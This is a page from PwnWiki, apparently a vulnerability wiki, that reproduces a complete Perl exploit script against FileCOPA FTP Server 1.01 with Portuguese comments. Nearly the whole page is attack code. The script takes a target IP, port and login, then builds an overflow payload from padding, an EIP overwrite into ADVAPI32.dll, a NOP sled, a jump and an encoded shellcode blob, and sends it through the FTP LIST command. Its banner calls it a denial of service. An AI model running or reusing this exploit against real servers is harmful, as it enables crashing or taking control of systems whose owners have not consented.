免费、自由、人人可编辑的漏洞库--PwnWiki.com
,
Versión afectada
FileCOPA FTP Server 1.01
EXP
#!/usr/bin/perl # # e-mail: email protected # # Date: 04/06/2021 # # Version Vulnerable: FileCOPA FTP Server 1.01 # # OS Tested: Windows XP PACK 3 Brazilian e Windows 2000 # # Youtube video: https://youtu.be/A9cEoyY9Bd4 # # badchars \0x00\0x0a use Net::FTP; use Term::ANSIColor; $sis="$^O"; print $sis; if ($sis eq "windows"){ $cmd="cls"; } else { $cmd="clear"; } system("$cmd"); if ((!$ARGV0) || (!$ARGV1)) { &apresentacao(); } sub apresentacao { print q { ###################################################### # # # * FileCOPA FTP Server 1.01 - Denied of Service # # # # * Author: Fernando Mengali # # # # + Modo de uso: perl exploit.pl <IP> <Porta> # # # ################# Code Exploit ####################### } } our $alvo = $ARGV0; our $porta = $ARGV1; if (!$ARGV0 && !$ARGV1) { exit; } if($alvo !~ /(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})/) { print color('red bold'); print " \n\n - Por favor, defina o IP alvo! \n\n"; color('reset'); exit; } if($porta < 0 || $porta > 65535) { print color('red bold'); print " \n\n - Por favor, defina uma porta de 1 a 65535! \n\n"; color('reset'); exit; } print color('green bold'); print "\n\nAlvo definido =>" .$alvo . " \n \n"; print "Porta definida =>" .$porta . "\n\n"; color('reset'); print color('yellow bold'); print "+ Por favor, informe a nome de usuário: "; color('reset'); print color('red bold'); my $usuario = <stdin>; chomp($usuario); color('reset'); print color('yellow bold'); print "* Por favor, informe a senha de acesso: "; color('reset'); print color('red bold'); my $senha = <stdin>; chomp($senha); color('reset'); my $buf = "\xba\x17\x61\x66\xaf\xdb\xd9\xd9\x74\x24\xf4\x5d\x2b\xc9" . "\xb1\x60\x31\x55\x12\x83\xed\xfc\x03\x42\x6f\x84\x5a\xb7" . "\xa9\xf0\x15\x7b\xd9\xfb\x8f\xf7\x01\x08\x75\xdc\x80\x41" . "\xd3\x13\x51\xba\xe7\x11\x4d\x39\x25\x21\xb3\x27\x8b\x30" . "\xef\xf1\xac\xbd\x95\xe9\xcf\x1a\x1d\xb9\xe1\xf6\x27\x0b" . "\xff\x02\x98\xc0\xf6\xc7\x19\x52\xc4\x94\x18\xdb\x56\x20" . "\xb6\x9a\xc4\xb5\xec\xf3\x40\xd4\x19\x17\x6d\x35\x50\x3a" . "\x13\xc3\xb3\xf0\x38\x8d\xff\xc5\x05\x55\x33\xe7\xd2\x9e" . "\xb6\x8c\x9b\x79\xce\x8f\xd6\x30\x72\x12\x62\x26\x3e\xed" . "\xef\xda\x23\x88\x07\x74\xdc\xbe\xe1\xc4\x3e\x91\x8a\x26" . "\x3a\x3f\x2b\xf2\xe5\x3a\x18\x0f\xd0\x8d\x7b\xba\xf3\xba" . "\x2b\x5b\xa5\x2d\x54\xaa\x88\x68\x4b\xf4\xcc\x24\x68\xc1" . "\x19\x22\xf9\x08\xd6\x08\x8f\x4a\xe0\x7d\x67\xc1\x4e\xd8" . "\x08\x34\x44\x2b\x6a\x6f\x41\x6d\x53\x26\x73\x9d\xb4\xca" . "\x87\xed\xe6\x2d\x8b\x1c\x42\x0e\xb3\x20\xd0\xa1\x48\x97" . "\x45\x46\x26\x6b\xe7\x74\x52\xc1\xae\x2d\x8d\x1a\x06\xe0" . "\x24\x26\xbe\xfe\x26\xf8\x48\x75\x73\x5d\x6c\x67\xeb\xf4" . "\xf4\x08\x91\xf8\x5f\x4a\x3a\xd4\x5c\xd4\x7c\x52\x13\xa5" . "\x08\x06\xc9\x8b\x04\x9a\x0f\xe5\xe8\x1f\xef\x28\x3b\xe9" . "\x6e\xf9\xee\x7e\xf0\x5c\x5e\x4f\x95\x49\x0f\x83\xf0\x70" . "\x09\xf6\x83\xe9\x43\xb8\xe0\x88\x51\x6e\x9c\x5d\x48\x5b" . "\x9b\xca\x9a\xf1\x48\xa8\x51\x22\x61\x12\x55\xfe\x10\x16" . "\xb5\x42\x42\xff\x15\x14\x3f\x44\x9b\x92\xfc\xd9\x67\xe0" . "\x15\xd1\x64\xce\x75\xec\xa3\x08\x03\x61\x4a\x3b\x0e\x5a" . "\xb0\x7b\xe6\x2c\xac\xae\x5d\xad\x71\xf5\xb8\xc4\x4f\xd3" . "\xf4\x40\x2b\x92\x75\x83\xe3\x0f\x4c\x23\x78\x72\x0f\x22" . "\xb9\x10\xa6\x1d\xc9\xcb\xca\xe5\x61\xf8\x5f\x64\x86\x49" . "\x5b\xb2\x9e\x75\x30\xc6\x6e\x3c\x9a\x02\xad\x03\x36\x29" . "\xaf\x84\x62\x98\x22\xcd\xbf\x7e\xa2\x14\x97\x75\xa2\xc3" . "\xab"; $offset = "\x41"x320; $NOPS= "\x90"x3105; $JMP = "\xe9\xbf\x2c\xb0\xff"; # jmp para endereco de memória $EIP= "\x93\x79\x2e\x7c"; # Aqui o jmp na biblioteca ADVAPI32.dll $payload = $offset . $EIP . $NOPS . $JMP . $buf . "\r\n"; print color('cyan'); print "\n\n+ Conectando para o servidor " . $alvo . ":" . $porta."... \n"; $ftp = Net::FTP->new($alvo, Debug => 0, Port => $porta) || die color('red')."\n- Não foi possível conectar. \n"; sleep(2); print "+ Conectado!\n"; sleep(2); $ftp->login($usuario,$senha) || die color('red')."\n - Não pode conectar ou você derrubou: $!"; print "+ Autenticando...\n"; sleep(2); print "+ Autenticado com sucesso!\n\n"; sleep(2); print "* Sobrecarregando o servidor...\n\n"; sleep(2); $ftp->command("LIST A", $payload); color('reset'); print color('green bold'); print "+ Servidor fora do ar!\n"; color('reset'); exit(0);
免费、自由、人人可编辑的漏洞库--pwnwiki.com